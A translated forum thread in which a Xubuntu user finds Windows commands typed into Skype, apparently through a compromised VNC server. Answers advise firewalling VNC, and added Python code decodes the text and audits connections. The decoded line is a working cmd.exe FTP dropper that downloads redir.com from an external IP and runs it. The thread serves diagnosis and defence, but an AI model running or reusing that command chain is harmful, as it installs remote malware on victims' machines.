Olegi4, 2012-06-30 22:07:26
linux

Skype on Xubuntu is sending Windows command-line commands into the chat by itself. How does this happen?

From a user in my contact list comes the following (all of it is typed into the active chat window by itself; nobody is at the computer):
%ыныеуькщще%\ыныеуь32\сьвюучу вуд уй?усрщ щзут 78ю84ю206ю167 26578 ЮЮ уй?усрщ гыук 22725 24588 ЮЮ уй ?усрщ пуе кувшкюсщь ЮЮ уй ?усрщ йгше ЮЮ уй ?аез -т -ыЖуй ?кувшкюсщь ?вуд уй


If we convert the Russian letters into the Latin letters on the same keys, we get:
%systemroot%\system32\cmd.exe del eq&echo open 78.84.206.167 26578 >> eq&echo user 22725 24588 >> eq &echo get redir.com >> eq &echo quit >> eq &ftp -n -s:eq &redir.com &del eq

The process listing looks like this:
jury@xubuntu:~$ ps ax
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:00 /sbin/init
    2 ?        S      0:00 [kthreadd]
    3 ?        S      0:01 [ksoftirqd/0]
    5 ?        S      0:01 [kworker/u:0]
    6 ?        S      0:00 [migration/0]
    7 ?        S      0:00 [watchdog/0]
    8 ?        S<     0:00 [cpuset]
    9 ?        S<     0:00 [khelper]
   10 ?        S      0:00 [kdevtmpfs]
   11 ?        S<     0:00 [netns]
   12 ?        S      0:00 [sync_supers]
   13 ?        S      0:00 [bdi-default]
   14 ?        S<     0:00 [kintegrityd]
   15 ?        S<     0:00 [kblockd]
   16 ?        S<     0:00 [ata_sff]
   17 ?        S      0:00 [khubd]
   18 ?        S<     0:00 [md]
   21 ?        S      0:00 [khungtaskd]
   22 ?        S      0:00 [kswapd0]
   23 ?        SN     0:00 [ksmd]
   24 ?        SN     0:00 [khugepaged]
   25 ?        S      0:00 [fsnotify_mark]
   26 ?        S      0:00 [ecryptfs-kthrea]
   27 ?        S<     0:00 [crypto]
   35 ?        S<     0:00 [kthrotld]
   40 ?        S      0:00 [scsi_eh_0]
   41 ?        S      0:00 [scsi_eh_1]
   42 ?        S      0:00 [scsi_eh_2]
   43 ?        S      0:00 [scsi_eh_3]
   46 ?        S      0:00 [scsi_eh_4]
   48 ?        S      0:00 [kworker/u:7]
   70 ?        S<     0:00 [devfreq_wq]
  197 ?        S<     0:00 [firewire]
  223 ?        S      0:00 [jbd2/sda1-8]
  224 ?        S<     0:00 [ext4-dio-unwrit]
  242 ?        S      0:00 [flush-8:0]
  309 ?        S      0:00 upstart-udev-bridge --daemon
  315 ?        Ss     0:00 /sbin/udevd --daemon
  495 ?        Ss     0:00 dbus-daemon --system --fork --activation=upstart
  529 ?        Ss     0:00 /usr/sbin/modem-manager
  530 ?        Ss     0:00 /usr/sbin/bluetoothd
  553 ?        S      0:00 /sbin/udevd --daemon
  554 ?        S      0:00 /sbin/udevd --daemon
  582 ?        Ssl    0:00 NetworkManager
  583 ?        Sl     0:00 rsyslogd -c5
  585 ?        S<     0:00 [krfcommd]
  591 ?        S      0:00 avahi-daemon: running [xubuntu.local]
  592 ?        S      0:00 avahi-daemon: chroot helper
  594 ?        Ss     0:00 /usr/sbin/cupsd -F
  599 ?        Sl     0:00 /usr/lib/policykit-1/polkitd --no-debug
  630 ?        S<     0:00 [kmemstick]
  631 ?        S<     0:00 [cfg80211]
  633 ?        S<     0:00 [hci0]
  635 ?        S      0:00 [r592_io]
  646 ?        S<     0:00 [r852]
  648 ?        S<     0:00 [kpsmoused]
  658 ?        S<     0:00 [iwl3945]
  748 ?        S      0:00 upstart-socket-bridge --daemon
  832 ?        S<     0:00 [hd-audio0]
  876 tty4     Ss+    0:00 /sbin/getty -8 38400 tty4
  882 ?        Ss     0:04 /opt/logmein-hamachi/bin/hamachid
  883 tty5     Ss+    0:00 /sbin/getty -8 38400 tty5
  897 tty2     Ss+    0:00 /sbin/getty -8 38400 tty2
  898 tty3     Ss+    0:00 /sbin/getty -8 38400 tty3
  906 tty6     Ss+    0:00 /sbin/getty -8 38400 tty6
  924 ?        Ss     0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
  930 ?        Ss     0:00 cron
  931 ?        Ss     0:00 atd
  933 ?        Ssl    0:00 lightdm
  971 ?        S      0:00 /sbin/dhclient -d -4 -sf /usr/lib/NetworkManager/nm-d
  990 ?        Ss     0:00 /sbin/wpa_supplicant -B -P /run/sendsigs.omit.d/wpasu
 1003 tty7     Ss+    3:27 /usr/bin/X :0 -auth /var/run/lightdm/root/:0 -noliste
 1156 tty1     Ss+    0:00 /sbin/getty -8 38400 tty1
 1161 ?        Sl     0:00 lightdm --session-child 12 15
 1164 ?        Sl     0:00 /usr/lib/accountsservice/accounts-daemon
 1167 ?        Sl     0:00 /usr/sbin/console-kit-daemon --no-daemon
 1242 ?        Ss     0:00 /bin/sh /etc/xdg/xfce4/xinitrc - /etc/X11/xinit/xser
 1274 ?        Ss     0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-s
 1277 ?        S      0:00 /usr/bin/dbus-launch --exit-with-session startxfce4
 1278 ?        Ss     0:00 //bin/dbus-daemon --fork --print-pid 5 --print-addres
 1286 ?        S      0:00 /usr/lib/xfce4/xfconf/xfconfd
 1292 ?        S      0:00 xscreensaver -no-splash
 1294 ?        Sl     0:00 xfce4-session
 1299 ?        R      0:07 xfwm4 --replace --display :0.0 --sm-client-id 2197b57
 1301 ?        S      0:00 xfsettingsd --force
 1302 ?        S      0:00 Thunar --sm-client-id 2850f410b-2b5d-4b02-a09c-8babb4
 1303 ?        S      0:00 /usr/sbin/dnsmasq --no-resolv --keep-in-foreground -
 1317 ?        S      0:00 /usr/lib/gvfs/gvfsd
 1323 ?        Sl     0:00 /usr/lib/gvfs//gvfs-fuse-daemon -f /home/jury/.gvfs
 1324 ?        Sl     0:05 xfce4-panel --display :0.0 --sm-client-id 2b36910b5-6
 1342 ?        S      0:00 xfdesktop --display :0.0 --sm-client-id 25e5d684f-707
 1347 ?        Sl     4:53 skype -session 2565a2699-83c9-42fc-bc26-cb1a56ce6f6c_
 1350 ?        Ssl    0:00 xfce4-power-manager --restart --sm-client-id 27da1e81
 1354 ?        S      0:15 xfce4-settings-helper --display :0.0 --sm-client-id 2
 1381 ?        Sl     0:00 /usr/lib/upower/upowerd
 1549 ?        S      0:00 /usr/lib/i386-linux-gnu/xfce4/panel/wrapper /usr/lib/
 1551 ?        S      0:00 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-ora
 1554 ?        S      0:00 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-wea
 1555 ?        S      0:04 /usr/lib/i386-linux-gnu/xfce4/panel-plugins/xfce4-xkb
 1558 ?        S      0:00 /usr/lib/gvfs/gvfs-gdu-volume-monitor
 1560 ?        Sl     0:00 /usr/lib/udisks/udisks-daemon
 1561 ?        S      0:00 udisks-daemon: not polling any devices
 1564 ?        S      0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
 1566 ?        Sl     0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor
 1571 ?        S      0:00 /usr/lib/i386-linux-gnu/gconf/gconfd-2
 1574 ?        S      0:00 /usr/lib/gvfs/gvfsd-trash --spawner :1.9 /org/gtk/gvf
 1577 ?        Sl     6:16 /home/jury/firefox-en/firefox-en
 1579 ?        S      0:22 x11vnc -display :0 -forever
 1590 ?        Sl     0:00 zeitgeist-datahub
 1594 ?        S<l    0:55 /usr/bin/pulseaudio --start --log-target=syslog
 1596 ?        SNl    0:00 /usr/lib/rtkit/rtkit-daemon
 1600 ?        Sl     0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authenticatio
 1610 ?        Sl     0:00 /usr/bin/zeitgeist-daemon
 1612 ?        Ssl    0:03 xfce4-volumed
 1614 ?        S      0:00 orage
 1647 ?        Sl     0:00 /usr/lib/zeitgeist/zeitgeist-fts
 1667 ?        S      0:00 /bin/cat
 1676 ?        Sl     0:00 /usr/lib/i386-linux-gnu/at-spi2-core/at-spi-bus-launc
 1720 ?        Sl     1:49 /home/jury/firefox-ru/plugin-container /usr/lib/flash
 1842 ?        S      0:00 [kworker/0:1]
 1855 ?        S      0:00 [kworker/u:1]
 1922 ?        S      0:00 [kworker/0:0]
 1923 ?        S      0:28 xfce4-taskmanager
 1932 ?        S      0:00 [kworker/0:2]
 1938 ?        Sl     0:00 /usr/bin/xfce4-terminal
 1939 ?        Z      0:00 [xfce4-terminal]
 1940 pts/0    Ss     0:00 bash
 1995 pts/0    R+     0:00 ps ax

Of the non-standard software, Hamachi and a VNC server are permanently installed on the remote computer.

The only mention of such a problem I found on the Internet is www.linux-bg.org/forum/index.php?topic=43213.0

The question is really what this can be and how to defeat it.

Thank you!
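The decoding the questioner did by hand, as an added example (not code from the original post): a Latin keystroke sent over a VNC keyboard channel while a Russian (ЙЦУКЕН) layout is active on the Linux side lands as the Cyrillic character on the same physical key, so reversing it is a fixed character substitution. The tables below are the standard Russian layout over US QWERTY; the indicator extraction assumes the "echo ... >> script & ftp -n -s:script" FTP dropper shape that the decoded command has. PAYLOAD is the string from the question; the function names are this example's own.

```python
"""Decode a command typed through the wrong keyboard layout and pull out its indicators."""
import re

# US QWERTY keys row by row, unshifted then shifted, then the shifted digits whose
# Russian symbols differ. _CYRILLIC lists the same physical keys in the Russian layout,
# so position i of one string is position i of the other (34 + 34 + 5 characters each).
_LATIN = (
    "qwertyuiop[]" "asdfghjkl;'" "zxcvbnm,./" "`"
    "QWERTYUIOP{}" 'ASDFGHJKL:"' "ZXCVBNM<>?" "~"
    "@#$^&"
)
_CYRILLIC = (
    "йцукенгшщзхъ" "фывапролджэ" "ячсмитьбю." "ё"
    "ЙЦУКЕНГШЩЗХЪ" "ФЫВАПРОЛДЖЭ" "ЯЧСМИТЬБЮ," "Ё"
    '"№;:?'
)
_TO_LATIN = str.maketrans(_CYRILLIC, _LATIN)

# The text from the question, verbatim (raw string so the backslashes survive).
PAYLOAD = r"%ыныеуькщще%\ыныеуь32\сьвюучу вуд уй?усрщ щзут 78ю84ю206ю167 26578 ЮЮ уй?усрщ гыук 22725 24588 ЮЮ уй ?усрщ пуе кувшкюсщь ЮЮ уй ?усрщ йгше ЮЮ уй ?аез -т -ыЖуй ?кувшкюсщь ?вуд уй"


def decode_layout(text):
    """Map each Cyrillic-layout character back to the Latin key it was typed on.
    Characters identical in both layouts (digits, space, '-', '%', backslash) pass through."""
    return text.translate(_TO_LATIN)


def extract_ftp_iocs(cmdline):
    """Walk the &-chained cmd.exe command and collect what a Windows host would have done:
    FTP server, credentials, the files fetched, and which of them were then executed."""
    iocs = {"script": None, "ftp_host": None, "ftp_port": None,
            "ftp_user": None, "ftp_pass": None, "downloads": [], "executed": []}
    parts = [p.strip() for p in cmdline.split("&") if p.strip()]
    for part in parts:
        # Each 'echo <ftp command> >> <script>' part is one line of the FTP script.
        m = re.match(r"echo\s+(.*?)\s*>>\s*(\S+)$", part)
        if not m:
            continue
        words = m.group(1).split()
        iocs["script"] = m.group(2)
        if words[0] == "open" and len(words) >= 2:
            iocs["ftp_host"] = words[1]
            iocs["ftp_port"] = int(words[2]) if len(words) > 2 else 21
        elif words[0] == "user" and len(words) >= 3:
            iocs["ftp_user"], iocs["ftp_pass"] = words[1], words[2]
        elif words[0] in ("get", "mget") and len(words) >= 2:
            iocs["downloads"].append(words[1])
    # A bare command part that names a downloaded file is the execution step.
    iocs["executed"] = [p for p in parts if p in iocs["downloads"]]
    return iocs


if __name__ == "__main__":
    decoded = decode_layout(PAYLOAD)
    print(decoded)
    for key, value in extract_ftp_iocs(decoded).items():
        print(f"{key:>10}: {value}")
```

Because the translation is a single pass over the original characters, ASCII punctuation that belongs to the Russian layout ('.' for '/', '?' for '&', 'Ж' for ':') is handled without chaining; that is what turns "ЮЮ" into ">>" and "-ыЖуй" into "-s:eq". On the Windows box the attacker was aiming at, the result would have fetched redir.com from the FTP server over a non-standard port and run it; on this Xubuntu box the keystrokes simply landed in whatever window had focus, which happened to be Skype.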

2 answers

Vladimir Dubrovin, 2012-06-30
@Olegi4

Perhaps someone is brute-forcing or breaking VNC with a script, successfully in your case, but the script is tailored for Windows, hence this effect. Change the passwords and firewall VNC so that access is allowed only from a list of permitted networks.

oia, 2012-06-30
@oia

You can check the computer for viruses, see what connections are happening with netstat, and check autostart.
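Both answers above applied to a connection listing, as an added example that is not part of either answer: the script parses `netstat -tnpa` style output, flags a VNC listener (TCP 5900-5999) bound to every interface and any established VNC session whose peer is outside an allowlist of networks, and emits the iptables rules that implement "only from the allowed networks". The sample listing, the allowlist (a LAN plus Hamachi's 25.0.0.0/8, since hamachid is in the questioner's process list) and the 203.0.113.45 peer are constructed for the example.

```python
"""Audit VNC exposure from a netstat listing and generate an allowlist firewall."""
import ipaddress

VNC_PORTS = range(5900, 6000)
WILDCARDS = {ipaddress.ip_address("0.0.0.0"), ipaddress.ip_address("::")}

# Assumed allowlist: the local LAN and the Hamachi range. Adjust to your own networks.
ALLOWED_NETWORKS = [ipaddress.ip_network(n) for n in ("192.168.1.0/24", "25.0.0.0/8")]

# Constructed sample in `netstat -tnpa` layout. 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for an unknown remote peer and a Skype server.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1579/x11vnc
tcp        0      0 192.168.1.7:5900        192.168.1.20:51234      ESTABLISHED 1579/x11vnc
tcp        0      0 192.168.1.7:5900        203.0.113.45:49152      ESTABLISHED 1579/x11vnc
tcp        0      0 192.168.1.7:44321       198.51.100.9:443        ESTABLISHED 1347/skype
tcp6       0      0 :::631                  :::*                    LISTEN      594/cupsd
"""


def _split_endpoint(endpoint):
    """'192.168.1.7:5900' -> (IPv4Address, 5900); ':::631' -> (IPv6Address('::'), 631).
    The port is None for the '*' of a listening socket."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host), (None if port == "*" else int(port))


def parse_netstat(text):
    """Parse the TCP rows of netstat -tnpa output into dicts; header and non-TCP rows are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local_ip, local_port = _split_endpoint(fields[3])
        remote_ip, remote_port = _split_endpoint(fields[4])
        rows.append({
            "local_ip": local_ip, "local_port": local_port,
            "remote_ip": remote_ip, "remote_port": remote_port,
            "state": fields[5],
            "program": fields[6] if len(fields) > 6 else "",
        })
    return rows


def is_allowed(ip):
    """True when the address falls inside one of the allowlisted networks."""
    return any(ip in net for net in ALLOWED_NETWORKS)


def audit_vnc(rows):
    """Return (severity, message) findings: a VNC listener on a wildcard address is
    reachable from every interface; an ESTABLISHED VNC session from outside the
    allowlist is the connection to chase."""
    findings = []
    for r in rows:
        if r["local_port"] not in VNC_PORTS:
            continue
        if r["state"] == "LISTEN" and r["local_ip"] in WILDCARDS:
            findings.append(("warn", f"{r['program']} listens on all interfaces ({r['local_ip']}:{r['local_port']})"))
        elif r["state"] == "ESTABLISHED" and not is_allowed(r["remote_ip"]):
            findings.append(("alert", f"VNC session from {r['remote_ip']} (not in allowlist) to {r['program']}"))
    return findings


def iptables_rules(networks=ALLOWED_NETWORKS, ports="5900:5999"):
    """Accept the VNC port range from each allowed network, then drop it from everyone else."""
    rules = [f"iptables -A INPUT -p tcp --dport {ports} -s {net} -j ACCEPT" for net in networks]
    rules.append(f"iptables -A INPUT -p tcp --dport {ports} -j DROP")
    return rules


if __name__ == "__main__":
    for severity, message in audit_vnc(parse_netstat(SAMPLE_NETSTAT)):
        print(f"[{severity}] {message}")
    print("\n".join(iptables_rules()))
```

Run it against real output with `netstat -tnpa` (or `ss -tnp`, whose columns differ) piped into `parse_netstat`. x11vnc can enforce the same allowlist itself with `-allow 192.168.1.,25.` and should carry a password file via `-rfbauth`; the command line in the questioner's listing (`x11vnc -display :0 -forever`) shows neither flag, though options could still come from an ~/.x11vncrc file.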
